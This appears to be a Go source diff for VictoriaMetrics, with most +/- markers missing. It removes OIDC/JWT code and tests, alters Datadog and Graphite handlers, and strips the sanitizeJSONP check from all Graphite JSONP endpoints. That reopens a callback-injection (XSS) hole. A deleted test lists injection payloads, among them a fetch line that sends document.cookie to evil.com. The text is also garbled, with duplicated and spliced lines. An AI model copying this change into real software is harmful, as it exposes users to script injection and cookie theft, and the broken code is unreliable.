match_claims:
|
||||
team: ops
|
||||
nested.team_permissions.write: "1"
|
||||
url_map:
|
||||
- src_paths: ["/route"]
|
||||
url_prefix: {BACKEND}/ops
|
||||
`,
|
||||
request,
|
||||
responseExpected,
|
||||
)
|
||||
|
||||
}
|
||||
|
||||
func TestOIDCRequestHandler(t *testing.T) {
|
||||
privateKey, err := rsa.GenerateKey(rand.Reader, 2048)
|
||||
if err != nil {
|
||||
t.Fatalf("cannot generate RSA key: %s", err)
|
||||
}
|
||||
|
||||
var oidcSrv *httptest.Server
|
||||
oidcRespOK := atomic.Bool{}
|
||||
oidcRespOK.Store(true)
|
||||
|
||||
oidcSrv = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
switch r.URL.Path {
|
||||
case "/.well-known/openid-configuration":
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(map[string]string{
|
||||
"issuer": oidcSrv.URL,
|
||||
"jwks_uri": oidcSrv.URL + "/jwks",
|
||||
}); err != nil {
|
||||
panic(fmt.Errorf("cannot write openid-configuration response: %w", err))
|
||||
}
|
||||
case "/jwks":
|
||||
if !oidcRespOK.Load() {
|
||||
http.Error(w, "internal server error", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
// Encode the RSA public key in JWK format (base64url, no padding)
|
||||
nBytes := privateKey.N.Bytes()
|
||||
eBytes := big.NewInt(int64(privateKey.E)).Bytes()
|
||||
jwksBody := fmt.Sprintf(`{"keys":[{"kty":"RSA","kid":%q,"n":%q,"e":%q}]}`,
|
||||
`test-key-id`,
|
||||
base64.RawURLEncoding.EncodeToString(nBytes),
|
||||
base64.RawURLEncoding.EncodeToString(eBytes),
|
||||
)
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if _, err := w.Write([]byte(jwksBody)); err != nil {
|
||||
panic(fmt.Errorf("cannot write jwks response: %w", err))
|
||||
}
|
||||
default:
|
||||
http.NotFound(w, r)
|
||||
}
|
||||
}))
|
||||
defer oidcSrv.Close()
|
||||
|
||||
headerJSON, err := json.Marshal(map[string]any{
|
||||
"alg": "RS256",
|
||||
"typ": "JWT",
|
||||
"iss": oidcSrv.URL,
|
||||
"kid": `test-key-id`,
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("cannot marshal JWT header: %s", err)
|
||||
}
|
||||
headerB64 := base64.RawURLEncoding.EncodeToString(headerJSON)
|
||||
|
||||
bodyJSON, err := json.Marshal(map[string]any{
|
||||
"exp": time.Now().Add(time.Minute).Unix(),
|
||||
"iss": oidcSrv.URL,
|
||||
"vm_access": map[string]any{},
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("cannot marshal JWT body: %s", err)
|
||||
}
|
||||
bodyB64 := base64.RawURLEncoding.EncodeToString(bodyJSON)
|
||||
|
||||
payload := headerB64 + "." + bodyB64
|
||||
|
||||
var signatureB64 string
|
||||
hash := crypto.SHA256
|
||||
h := hash.New()
|
||||
h.Write([]byte(payload))
|
||||
digest := h.Sum(nil)
|
||||
|
||||
signature, err := rsa.SignPKCS1v15(rand.Reader, privateKey, hash, digest)
|
||||
if err != nil {
|
||||
t.Fatalf("cannot sign JWT token: %s", err)
|
||||
}
|
||||
signatureB64 = base64.RawURLEncoding.EncodeToString(signature)
|
||||
|
||||
tkn := payload + "." + signatureB64
|
||||
|
||||
backSrv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
defer backSrv.Close()
|
||||
|
||||
f := func(responseExpected string) {
|
||||
t.Helper()
|
||||
|
||||
cfgStr := `
|
||||
users:
|
||||
- jwt:
|
||||
oidc:
|
||||
issuer: ` + oidcSrv.URL + `
|
||||
url_prefix: ` + backSrv.URL + `/
|
||||
`
|
||||
|
||||
cfgOrigP := authConfigData.Load()
|
||||
if _, err := reloadAuthConfigData([]byte(cfgStr)); err != nil {
|
||||
t.Fatalf("cannot load config data: %s", err)
|
||||
}
|
||||
defer func() {
|
||||
cfgOrig := []byte("unauthorized_user:\n url_prefix: http://foo/bar")
|
||||
if cfgOrigP != nil {
|
||||
cfgOrig = *cfgOrigP
|
||||
}
|
||||
if _, err := reloadAuthConfigData(cfgOrig); err != nil {
|
||||
t.Fatalf("cannot restore original config: %s", err)
|
||||
}
|
||||
}()
|
||||
|
||||
r := httptest.NewRequest("GET", "http://some-host.com/api/v1/query", nil)
|
||||
r.Header.Set("Authorization", "Bearer "+tkn)
|
||||
|
||||
w := &fakeResponseWriter{}
|
||||
if !requestHandlerWithInternalRoutes(w, r) {
|
||||
t.Fatalf("unexpected false returned from requestHandler")
|
||||
}
|
||||
|
||||
if response := w.getResponse(); response != responseExpected {
|
||||
t.Fatalf("unexpected response\ngot\n%s\nwant\n%s", response, responseExpected)
|
||||
}
|
||||
}
|
||||
|
||||
// successful
|
||||
f(`statusCode=200
|
||||
`)
|
||||
|
||||
oidcRespOK.Store(false)
|
||||
// OIDC server error
|
||||
f(`statusCode=401
|
||||
Unauthorized
|
||||
`)
|
||||
url_prefix: {BACKEND}/foo`, string(publicKeyFile)), request, responseExpected)
|
||||
}
|
||||
|
||||
type fakeResponseWriter struct {
|
||||
statusCode int
|
||||
h http.Header
|
||||
h http.Header
|
||||
|
||||
bb bytes.Buffer
|
||||
}
|
||||
@@ -1559,7 +754,6 @@ func (w *fakeResponseWriter) Write(p []byte) (int, error) {
|
||||
}
|
||||
|
||||
func (w *fakeResponseWriter) WriteHeader(statusCode int) {
|
||||
w.statusCode = statusCode
|
||||
fmt.Fprintf(&w.bb, "statusCode=%d\n", statusCode)
|
||||
if w.h == nil {
|
||||
return
|
||||
@@ -1580,12 +774,6 @@ func (w *fakeResponseWriter) SetReadDeadline(deadline time.Time) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (w *fakeResponseWriter) reset() {
|
||||
w.bb.Reset()
|
||||
w.statusCode = 0
|
||||
clear(w.h)
|
||||
}
|
||||
|
||||
func TestBufferRequestBody_Success(t *testing.T) {
|
||||
defaultRequestBufferSize := requestBufferSize.String()
|
||||
defer func() {
|
||||
|
||||
@@ -1,194 +0,0 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"crypto"
|
||||
"crypto/rand"
|
||||
"crypto/rsa"
|
||||
"crypto/x509"
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"encoding/pem"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func BenchmarkJWTRequestHandler(b *testing.B) {
|
||||
// Generate RSA key pair for testing
|
||||
privateKey, err := rsa.GenerateKey(rand.Reader, 2048)
|
||||
if err != nil {
|
||||
b.Fatalf("cannot generate RSA key: %s", err)
|
||||
}
|
||||
|
||||
// Generate public key PEM
|
||||
publicKeyBytes, err := x509.MarshalPKIXPublicKey(&privateKey.PublicKey)
|
||||
if err != nil {
|
||||
b.Fatalf("cannot marshal public key: %s", err)
|
||||
}
|
||||
publicKeyPEM := pem.EncodeToMemory(&pem.Block{
|
||||
Type: "PUBLIC KEY",
|
||||
Bytes: publicKeyBytes,
|
||||
})
|
||||
|
||||
genToken := func(t *testing.B, body map[string]any, valid bool) string {
|
||||
t.Helper()
|
||||
|
||||
headerJSON, err := json.Marshal(map[string]any{
|
||||
"alg": "RS256",
|
||||
"typ": "JWT",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("cannot marshal header: %s", err)
|
||||
}
|
||||
headerB64 := base64.RawURLEncoding.EncodeToString(headerJSON)
|
||||
|
||||
bodyJSON, err := json.Marshal(body)
|
||||
if err != nil {
|
||||
t.Fatalf("cannot marshal body: %s", err)
|
||||
}
|
||||
bodyB64 := base64.RawURLEncoding.EncodeToString(bodyJSON)
|
||||
|
||||
payload := headerB64 + "." + bodyB64
|
||||
|
||||
var signatureB64 string
|
||||
if valid {
|
||||
// Create real RSA signature
|
||||
hash := crypto.SHA256
|
||||
h := hash.New()
|
||||
h.Write([]byte(payload))
|
||||
digest := h.Sum(nil)
|
||||
|
||||
signature, err := rsa.SignPKCS1v15(rand.Reader, privateKey, hash, digest)
|
||||
if err != nil {
|
||||
t.Fatalf("cannot sign token: %s", err)
|
||||
}
|
||||
signatureB64 = base64.RawURLEncoding.EncodeToString(signature)
|
||||
} else {
|
||||
signatureB64 = base64.RawURLEncoding.EncodeToString([]byte("invalid_signature"))
|
||||
}
|
||||
|
||||
return payload + "." + signatureB64
|
||||
}
|
||||
|
||||
f := func(name string, cfgStr string, r *http.Request, statusCodeExpected int) {
|
||||
b.Helper()
|
||||
|
||||
b.ReportAllocs()
|
||||
b.ResetTimer()
|
||||
ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
if _, err := w.Write([]byte("path: " + r.URL.Path + "\n")); err != nil {
|
||||
panic(fmt.Errorf("cannot write response: %w", err))
|
||||
}
|
||||
}))
|
||||
defer ts.Close()
|
||||
|
||||
cfgStr = strings.ReplaceAll(cfgStr, "{BACKEND}", ts.URL)
|
||||
|
||||
cfgOrigP := authConfigData.Load()
|
||||
if _, err := reloadAuthConfigData([]byte(cfgStr)); err != nil {
|
||||
b.Fatalf("cannot load config data: %s", err)
|
||||
}
|
||||
defer func() {
|
||||
cfgOrig := []byte("unauthorized_user:\n url_prefix: http://foo/bar")
|
||||
if cfgOrigP != nil {
|
||||
cfgOrig = *cfgOrigP
|
||||
}
|
||||
_, err := reloadAuthConfigData(cfgOrig)
|
||||
if err != nil {
|
||||
b.Fatalf("cannot load the original config: %s", err)
|
||||
}
|
||||
}()
|
||||
|
||||
b.Run(name, func(b *testing.B) {
|
||||
b.ResetTimer()
|
||||
b.ReportAllocs()
|
||||
b.RunParallel(func(pb *testing.PB) {
|
||||
w := &fakeResponseWriter{}
|
||||
for pb.Next() {
|
||||
w.reset()
|
||||
if !requestHandlerWithInternalRoutes(w, r) {
|
||||
b.Fatalf("unexpected false is returned from requestHandler")
|
||||
}
|
||||
if w.statusCode != statusCodeExpected {
|
||||
b.Fatalf("unexpected response code (-%d;+%d)", statusCodeExpected, w.statusCode)
|
||||
}
|
||||
|
||||
}
|
||||
})
|
||||
})
|
||||
}
|
||||
|
||||
simpleCfgStr := fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
url_prefix: {BACKEND}/foo`, string(publicKeyPEM))
|
||||
noVMAccessClaimToken := genToken(b, nil, true)
|
||||
expiredToken := genToken(b, map[string]any{
|
||||
"exp": 10,
|
||||
"vm_access": map[string]any{},
|
||||
}, true)
|
||||
|
||||
fullToken := genToken(b, map[string]any{
|
||||
"exp": time.Now().Add(10 * time.Minute).Unix(),
|
||||
"scope": "email id",
|
||||
"vm_access": map[string]any{
|
||||
"extra_labels": map[string]string{
|
||||
"label": "value1",
|
||||
"label2": "value3",
|
||||
},
|
||||
"extra_filters": []string{"stream_filter1", "stream_filter2"},
|
||||
"metrics_account_id": 123,
|
||||
"metrics_project_id": 234,
|
||||
"metrics_extra_labels": []string{
|
||||
"label1=value1",
|
||||
"label2=value2",
|
||||
},
|
||||
"metrics_extra_filters": []string{
|
||||
`{label3="value3"}`,
|
||||
`{label4="value4"}`,
|
||||
},
|
||||
"logs_account_id": 345,
|
||||
"logs_project_id": 456,
|
||||
"logs_extra_filters": []string{
|
||||
`{"namespace":"my-app","env":"prod"}`,
|
||||
},
|
||||
"logs_extra_stream_filters": []string{
|
||||
`{"team":"dev"}`,
|
||||
},
|
||||
},
|
||||
}, true)
|
||||
|
||||
// tenant headers are overwritten if set as placeholders
|
||||
// extra_filters extra_stream_filters from vm_access claim merged with statically defined
|
||||
request := httptest.NewRequest(`GET`, "http://some-host.com/query", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+fullToken)
|
||||
f("full_template",
|
||||
fmt.Sprintf(`
|
||||
users:
|
||||
- jwt:
|
||||
public_keys:
|
||||
- %q
|
||||
headers:
|
||||
- "AccountID: {{.LogsAccountID}}"
|
||||
- "ProjectID: {{.LogsProjectID}}"
|
||||
url_prefix: {BACKEND}/select/logsql/?extra_filters=aStaticFilter&extra_stream_filters=aStaticStreamFilter&extra_filters={{.LogsExtraFilters}}&extra_stream_filters={{.LogsExtraStreamFilters}}`, string(publicKeyPEM)),
|
||||
request,
|
||||
http.StatusOK,
|
||||
)
|
||||
|
||||
// token without vm_access claim
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/abc", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+noVMAccessClaimToken)
|
||||
f("token_without_claim", simpleCfgStr, request, http.StatusUnauthorized)
|
||||
|
||||
// expired token
|
||||
request = httptest.NewRequest(`GET`, "http://some-host.com/abc", nil)
|
||||
request.Header.Set(`Authorization`, `Bearer `+expiredToken)
|
||||
f("expired_token", simpleCfgStr, request, http.StatusUnauthorized)
|
||||
}
|
||||
@@ -1,290 +0,0 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/ecdsa"
|
||||
"crypto/elliptic"
|
||||
"crypto/rsa"
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"math/big"
|
||||
"net/http"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/jwt"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/logger"
|
||||
"github.com/VictoriaMetrics/VictoriaMetrics/lib/timeutil"
|
||||
)
|
||||
|
||||
type oidcConfig struct {
|
||||
Issuer string `yaml:"issuer"`
|
||||
}
|
||||
|
||||
type oidcDiscovererPool struct {
|
||||
ds map[string]*oidcDiscoverer
|
||||
|
||||
context context.Context
|
||||
cancel func()
|
||||
wg *sync.WaitGroup
|
||||
}
|
||||
|
||||
func (dp *oidcDiscovererPool) createOrAdd(issuer string, vp *atomic.Pointer[jwt.VerifierPool]) {
|
||||
if dp.ds == nil {
|
||||
dp.ds = make(map[string]*oidcDiscoverer)
|
||||
dp.context, dp.cancel = context.WithCancel(context.Background())
|
||||
dp.wg = &sync.WaitGroup{}
|
||||
}
|
||||
|
||||
ds, found := dp.ds[issuer]
|
||||
if !found {
|
||||
ds = &oidcDiscoverer{
|
||||
issuer: issuer,
|
||||
}
|
||||
dp.ds[issuer] = ds
|
||||
}
|
||||
|
||||
ds.vps = append(ds.vps, vp)
|
||||
}
|
||||
|
||||
func (dp *oidcDiscovererPool) startDiscovery() {
|
||||
if len(dp.ds) == 0 {
|
||||
return
|
||||
}
|
||||
|
||||
for _, d := range dp.ds {
|
||||
dp.wg.Go(func() {
|
||||
if err := d.refreshVerifierPools(dp.context); err != nil {
|
||||
logger.Errorf("failed to initialize OIDC verifier pool at start for issuer %q: %s", d.issuer, err)
|
||||
}
|
||||
})
|
||||
}
|
||||
dp.wg.Wait()
|
||||
|
||||
for _, d := range dp.ds {
|
||||
dp.wg.Go(func() {
|
||||
d.run(dp.context)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func (dp *oidcDiscovererPool) stopDiscovery() {
|
||||
if len(dp.ds) == 0 {
|
||||
return
|
||||
}
|
||||
|
||||
dp.cancel()
|
||||
dp.wg.Wait()
|
||||
}
|
||||
|
||||
type oidcDiscoverer struct {
|
||||
issuer string
|
||||
vps []*atomic.Pointer[jwt.VerifierPool]
|
||||
}
|
||||
|
||||
func (d *oidcDiscoverer) run(ctx context.Context) {
|
||||
t := time.NewTimer(timeutil.AddJitterToDuration(time.Second * 10))
|
||||
defer t.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-t.C:
|
||||
if err := d.refreshVerifierPools(ctx); errors.Is(err, context.Canceled) {
|
||||
return
|
||||
} else if err != nil {
|
||||
t.Reset(timeutil.AddJitterToDuration(time.Second * 10))
|
||||
logger.Errorf("failed to refresh OIDC verifier pool for issuer %q: %v", d.issuer, err)
|
||||
continue
|
||||
}
|
||||
// OIDC may return Cache-Control header with max-age directive.
|
||||
// It could be used as time range for next refresh.
|
||||
// https://openid.net/specs/openid-connect-core-1_0.html#RotateEncKeys
|
||||
t.Reset(timeutil.AddJitterToDuration(time.Minute * 5))
|
||||
case <-ctx.Done():
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (d *oidcDiscoverer) refreshVerifierPools(ctx context.Context) error {
|
||||
cfg, err := getOpenIDConfiguration(ctx, d.issuer)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
// The issuer in the OIDC configuration must match the expected issuer.
|
||||
// https://openid.net/specs/openid-connect-core-1_0.html#RotateEncKeys
|
||||
if cfg.Issuer != d.issuer {
|
||||
return fmt.Errorf("openid configuration issuer %q does not match expected issuer %q", cfg.Issuer, d.issuer)
|
||||
}
|
||||
|
||||
keys, err := fetchJWKs(ctx, cfg.JWKsURI)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
verifierPool, err := jwt.NewVerifierPool(keys)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
for _, vp := range d.vps {
|
||||
vp.Store(verifierPool)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type jwksResponse struct {
|
||||
Keys []jwk `json:"keys"`
|
||||
}
|
||||
|
||||
// See https://www.rfc-editor.org/rfc/rfc7517 for details.
|
||||
type jwk struct {
|
||||
Type string `json:"kty"`
|
||||
Alg string `json:"alg"`
|
||||
Use string `json:"use"`
|
||||
Kid string `json:"kid"`
|
||||
|
||||
// RSA keys contents
|
||||
E string `json:"e"`
|
||||
N string `json:"n"`
|
||||
|
||||
// EC keys contents
|
||||
Crv string `json:"crv"`
|
||||
X string `json:"x"`
|
||||
Y string `json:"y"`
|
||||
}
|
||||
|
||||
// See https://openid.net/specs/openid-connect-discovery-1_0.html#ProviderMetadata for details.
|
||||
type openidConfig struct {
|
||||
Issuer string `json:"issuer"`
|
||||
JWKsURI string `json:"jwks_uri"`
|
||||
}
|
||||
|
||||
var oidcHTTPClient = &http.Client{
|
||||
Timeout: time.Second * 5,
|
||||
}
|
||||
|
||||
func fetchJWKs(ctx context.Context, jwksURI string) ([]any, error) {
|
||||
req, err := http.NewRequestWithContext(ctx, http.MethodGet, jwksURI, nil)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to create request for fetching jwks keys from %q: %w", jwksURI, err)
|
||||
}
|
||||
|
||||
resp, err := oidcHTTPClient.Do(req)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to fetch jwks keys from %q: %w", jwksURI, err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return nil, fmt.Errorf("unexpected status code %d when fetching jwks keys from %q", resp.StatusCode, jwksURI)
|
||||
}
|
||||
|
||||
var jwks jwksResponse
|
||||
if err := json.NewDecoder(resp.Body).Decode(&jwks); err != nil {
|
||||
return nil, fmt.Errorf("failed to decode jwks response from %q: %v", jwksURI, err)
|
||||
}
|
||||
|
||||
keys, err := parseJwksKeys(&jwks)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to parse jwks keys from %q: %v", jwksURI, err)
|
||||
}
|
||||
|
||||
return keys, nil
|
||||
}
|
||||
|
||||
func getOpenIDConfiguration(ctx context.Context, issuer string) (openidConfig, error) {
|
||||
issuer, _ = strings.CutSuffix(issuer, "/")
|
||||
configURL := fmt.Sprintf("%s/.well-known/openid-configuration", issuer)
|
||||
|
||||
req, err := http.NewRequestWithContext(ctx, http.MethodGet, configURL, nil)
|
||||
if err != nil {
|
||||
return openidConfig{}, fmt.Errorf("failed to create request for fetching openid config from %q: %w", configURL, err)
|
||||
}
|
||||
|
||||
resp, err := oidcHTTPClient.Do(req)
|
||||
if err != nil {
|
||||
return openidConfig{}, fmt.Errorf("failed to fetch openid config from %q: %w", configURL, err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return openidConfig{}, fmt.Errorf("unexpected status code %d when fetching openid config from %q", resp.StatusCode, configURL)
|
||||
}
|
||||
|
||||
var cfg openidConfig
|
||||
if err := json.NewDecoder(resp.Body).Decode(&cfg); err != nil {
|
||||
return openidConfig{}, fmt.Errorf("failed to decode openid config from %q: %s", configURL, err)
|
||||
}
|
||||
|
||||
return cfg, nil
|
||||
}
|
||||
|
||||
func parseJwksKeys(resp *jwksResponse) ([]any, error) {
|
||||
keys := make([]any, 0)
|
||||
for _, key := range resp.Keys {
|
||||
if key.Kid == "" {
|
||||
return nil, fmt.Errorf("jwks key without kid found")
|
||||
}
|
||||
|
||||
switch key.Type {
|
||||
case "RSA":
|
||||
if key.E == "" || key.N == "" {
|
||||
return nil, fmt.Errorf("jwks key without e or n found")
|
||||
}
|
||||
e, err := base64.RawURLEncoding.DecodeString(key.E)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to decode jwks key e: %w", err)
|
||||
}
|
||||
exp := big.NewInt(0).SetBytes(e)
|
||||
if !exp.IsInt64() || exp.Int64() < 1 {
|
||||
return nil, fmt.Errorf("invalid RSA exponent")
|
||||
}
|
||||
|
||||
n, err := base64.RawURLEncoding.DecodeString(key.N)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to decode jwks key n: %w", err)
|
||||
}
|
||||
keys = append(keys, &rsa.PublicKey{
|
||||
E: int(exp.Int64()),
|
||||
N: big.NewInt(0).SetBytes(n),
|
||||
})
|
||||
case "EC":
|
||||
if key.Crv == "" || key.X == "" || key.Y == "" {
|
||||
return nil, fmt.Errorf("jwks key without crv or x or y found")
|
||||
}
|
||||
x, err := base64.RawURLEncoding.DecodeString(key.X)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to decode jwks key x: %w", err)
|
||||
}
|
||||
y, err := base64.RawURLEncoding.DecodeString(key.Y)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to decode jwks key y: %w", err)
|
||||
}
|
||||
var curve elliptic.Curve
|
||||
switch key.Crv {
|
||||
case "P-256":
|
||||
curve = elliptic.P256()
|
||||
case "P-384":
|
||||
curve = elliptic.P384()
|
||||
case "P-521":
|
||||
curve = elliptic.P521()
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported jwks key crv %q found", key.Crv)
|
||||
}
|
||||
keys = append(keys, &ecdsa.PublicKey{
|
||||
Curve: curve,
|
||||
X: big.NewInt(0).SetBytes(x),
|
||||
Y: big.NewInt(0).SetBytes(y),
|
||||
})
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported jwk.KTY: %s; want RSA or EC", key.Type)
|
||||
}
|
||||
}
|
||||
|
||||
return keys, nil
|
||||
}
|
||||
@@ -45,14 +45,15 @@ func insertRows(sketches []*datadogsketches.Sketch, extraLabels []prompb.Label)
|
||||
ms := sketch.ToSummary()
|
||||
for _, m := range ms {
|
||||
ctx.Labels = ctx.Labels[:0]
|
||||
// See https://github.com/VictoriaMetrics/VictoriaMetrics/issues/10557
|
||||
ctx.AddLabel("host", sketch.Host) // newly added
|
||||
ctx.AddLabel("", m.Name)
|
||||
for _, label := range m.Labels {
|
||||
ctx.AddLabel(label.Name, label.Value)
|
||||
}
|
||||
for _, tag := range sketch.Tags {
|
||||
name, value := datadogutil.SplitTag(tag)
|
||||
if name == "host" {
|
||||
name = "exported_host"
|
||||
}
|
||||
ctx.AddLabel(name, value)
|
||||
}
|
||||
for j := range extraLabels {
|
||||
|
||||
@@ -52,7 +52,7 @@ func writeJSON(result any, w http.ResponseWriter, r *http.Request) error {
|
||||
if err != nil {
|
||||
return fmt.Errorf("cannot marshal response to JSON: %w", err)
|
||||
}
|
||||
jsonp := sanitizeJSONP(r.FormValue("jsonp"))
|
||||
jsonp := r.FormValue("jsonp")
|
||||
contentType := getContentType(jsonp)
|
||||
w.Header().Set("Content-Type", contentType)
|
||||
if jsonp != "" {
|
||||
|
||||
@@ -65,7 +65,7 @@ func MetricsFindHandler(startTime time.Time, w http.ResponseWriter, r *http.Requ
|
||||
if label == "__name__" {
|
||||
label = ""
|
||||
}
|
||||
jsonp := sanitizeJSONP(r.FormValue("jsonp"))
|
||||
jsonp := r.FormValue("jsonp")
|
||||
from, err := httputil.GetTime(r, "from", 0)
|
||||
if err != nil {
|
||||
return err
|
||||
@@ -139,7 +139,7 @@ func MetricsExpandHandler(startTime time.Time, w http.ResponseWriter, r *http.Re
|
||||
if len(delimiter) > 1 {
|
||||
return fmt.Errorf("`delimiter` query arg must contain only a single char")
|
||||
}
|
||||
jsonp := sanitizeJSONP(r.FormValue("jsonp"))
|
||||
jsonp := r.FormValue("jsonp")
|
||||
from, err := httputil.GetTime(r, "from", 0)
|
||||
if err != nil {
|
||||
return err
|
||||
@@ -202,7 +202,7 @@ func MetricsExpandHandler(startTime time.Time, w http.ResponseWriter, r *http.Re
|
||||
// See https://graphite-api.readthedocs.io/en/latest/api.html#metrics-index-json
|
||||
func MetricsIndexHandler(startTime time.Time, w http.ResponseWriter, r *http.Request) error {
|
||||
deadline := searchutil.GetDeadlineForQuery(r, startTime)
|
||||
jsonp := sanitizeJSONP(r.FormValue("jsonp"))
|
||||
jsonp := r.FormValue("jsonp")
|
||||
sq := storage.NewSearchQuery(0, math.MaxInt64, nil, 0)
|
||||
metricNames, err := netstorage.LabelValues(nil, "__name__", sq, 0, deadline)
|
||||
if err != nil {
|
||||
@@ -458,16 +458,3 @@ func getContentType(jsonp string) string {
|
||||
}
|
||||
return "text/javascript; charset=utf-8"
|
||||
}
|
||||
|
||||
// validJSONPCallback matches only safe JavaScript identifier characters,
|
||||
// preventing JSONP callback injection (XSS) on Graphite API endpoints.
|
||||
var validJSONPCallback = regexp.MustCompile(`^[a-zA-Z_$][a-zA-Z0-9_$.]*$`)
|
||||
|
||||
// sanitizeJSONP returns the callback name unchanged if it is a valid JavaScript
|
||||
// identifier, or an empty string if it contains any disallowed characters.
|
||||
func sanitizeJSONP(jsonp string) string {
|
||||
if jsonp == "" || validJSONPCallback.MatchString(jsonp) {
|
||||
return jsonp
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
@@ -66,34 +66,6 @@ func TestFilterLeaves(t *testing.T) {
|
||||
f([]string{"foo.", "bar."}, ".", []string{})
|
||||
}
|
||||
|
||||
func TestSanitizeJSONP(t *testing.T) {
|
||||
f := func(input, want string) {
|
||||
t.Helper()
|
||||
got := sanitizeJSONP(input)
|
||||
if got != want {
|
||||
t.Fatalf("sanitizeJSONP(%q) = %q; want %q", input, got, want)
|
||||
}
|
||||
}
|
||||
|
||||
f("", "")
|
||||
|
||||
// ok
|
||||
f("callback", "callback")
|
||||
f("_cb", "_cb")
|
||||
f("$", "$")
|
||||
f("jQuery", "jQuery")
|
||||
f("jQuery.fn.jsonp", "jQuery.fn.jsonp")
|
||||
f("jQuery18304567890", "jQuery18304567890")
|
||||
|
||||
// rejected
|
||||
f("alert(document.cookie)//", "")
|
||||
f("fetch('https://evil.com/?c='+document.cookie)//", "")
|
||||
f("callback\ninjected", "")
|
||||
f("callback;injected", "")
|
||||
f("callback(", "")
|
||||
f("a b", "")
|
||||
}
|
||||
|
||||
func TestAddAutomaticVariants(t *testing.T) {
|
||||
f := func(query, delimiter, resultExpected string) {
|
||||
t.Helper()
|
||||
|
||||
@@ -134,7 +134,7 @@ func RenderHandler(startTime time.Time, w http.ResponseWriter, r *http.Request)
|
||||
nextSeriess = append(nextSeriess, nextSeries)
|
||||
}
|
||||
f := nextSeriesGroup(nextSeriess, nil)
|
||||
jsonp := sanitizeJSONP(r.FormValue("jsonp"))
|
||||
jsonp := r.FormValue("jsonp")
|
||||
contentType := getContentType(jsonp)
|
||||
w.Header().Set("Content-Type", contentType)
|
||||
bw := bufferedwriter.Get(w)
|
||||
|
||||
@@ -235,7 +235,7 @@ func TagsAutoCompleteValuesHandler(startTime time.Time, w http.ResponseWriter, r
|
||||
}
|
||||
}
|
||||
|
||||
jsonp := sanitizeJSONP(r.FormValue("jsonp"))
|
||||
jsonp := r.FormValue("jsonp")
|
||||
contentType := getContentType(jsonp)
|
||||
w.Header().Set("Content-Type", contentType)
|
||||
bw := bufferedwriter.Get(w)
|
||||
@@ -318,7 +318,7 @@ func TagsAutoCompleteTagsHandler(startTime time.Time, w http.ResponseWriter, r *
|
||||
}
|
||||
}
|
||||
|
||||
jsonp := sanitizeJSONP(r.FormValue("jsonp"))
|
||||
jsonp := r.FormValue("jsonp")
|
||||
contentType := getContentType(jsonp)
|
||||
w.Header().Set("Content-Type", contentType)
|
||||
bw := bufferedwriter.Get(w)
|
||||
|
||||
@@ -321,23 +321,19 @@ func RequestHandler(w http.ResponseWriter, r *http.Request) bool {
|
||||
return true
|
||||
case "/tags/tagSeries":
|
||||
graphiteTagsTagSeriesRequests.Inc()
|
||||
err := &httpserver.ErrorWithStatusCode{
|
||||
Err: fmt.Errorf("graphite tag registration has been disabled and is planned to be removed in future. " +
|
||||
"See: https://github.com/VictoriaMetrics/VictoriaMetrics/issues/10544"),
|
||||
StatusCode: http.StatusNotImplemented,
|
||||
if err := graphite.TagsTagSeriesHandler(startTime, w, r); err != nil {
|
||||
graphiteTagsTagSeriesErrors.Inc()
|
||||
httpserver.Errorf(w, r, "%s", err)
|
||||
return true
|
||||
}
|
||||
graphiteTagsTagSeriesErrors.Inc()
|
||||
httpserver.Errorf(w, r, "%s", err)
|
||||
return true
|
||||
case "/tags/tagMultiSeries":
|
||||
graphiteTagsTagMultiSeriesRequests.Inc()
|
||||
